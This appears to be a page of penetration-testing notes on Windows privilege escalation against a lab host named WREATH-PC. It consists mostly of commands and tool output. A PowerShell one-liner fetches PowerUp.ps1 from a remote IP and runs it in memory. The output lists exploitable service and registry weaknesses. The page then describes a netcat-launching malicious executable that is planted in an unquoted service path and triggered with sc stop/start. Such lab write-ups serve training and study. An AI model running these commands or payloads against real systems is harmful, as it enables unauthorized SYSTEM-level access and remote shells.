Priv Esc

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.50.102.164/PowerUp.ps1');Invoke-Allchecks"
Privilege   : SeImpersonatePrivilege
Attributes  : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 2112
ProcessId   : 788
Name        : 788
Check       : Process Token Privileges

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer; IdentityReference=BUILTIN\Users; 
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName    : SystemExplorerHelpService
Path           : C:\Program Files (x86)\System Explorer\System Explorer\service\SystemExplorerService64.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System 
                 Explorer\service\SystemExplorerService64.exe; IdentityReference=BUILTIN\Users; 
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'SystemExplorerHelpService' -Path <HijackPath>
CanRestart     : True
Name           : SystemExplorerHelpService
Check          : Unquoted Service Paths

ServiceName                     : SystemExplorerHelpService
Path                            : C:\Program Files (x86)\System Explorer\System 
                                  Explorer\service\SystemExplorerService64.exe
ModifiableFile                  : C:\Program Files (x86)\System Explorer\System 
                                  Explorer\service\SystemExplorerService64.exe
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : BUILTIN\Users
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'SystemExplorerHelpService'
CanRestart                      : True
Name                            : SystemExplorerHelpService
Check                           : Modifiable Service Files

ModifiablePath    : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
IdentityReference : WREATH-PC\Thomas
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\Thomas\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

Key            : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path           : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
Name           : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check          : Modifiable Registry Autorun

Key            : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path           : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
Name           : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check          : Modifiable Registry Autorun

Key            : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Path           : "C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe" /TRAY
ModifiableFile : @{ModifiablePath=C:\Program Files (x86)\System Explorer\System Explorer\SystemExplorer.exe; 
                 IdentityReference=BUILTIN\Users; Permissions=System.Object[]}
Name           : HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SystemExplorerAutoStart
Check          : Modifiable Registry Autorun

Compiled malicious executable to run nc

copy C:\Users\Thomas\Documents\System.exe "C:\Program Files (x86)\System Explorer\"

sc stop SystemExplorerHelpService
sc start SystemExplorerHelpService

PreviousExploit NextExfil

Last updated 11 months ago

Was this helpful?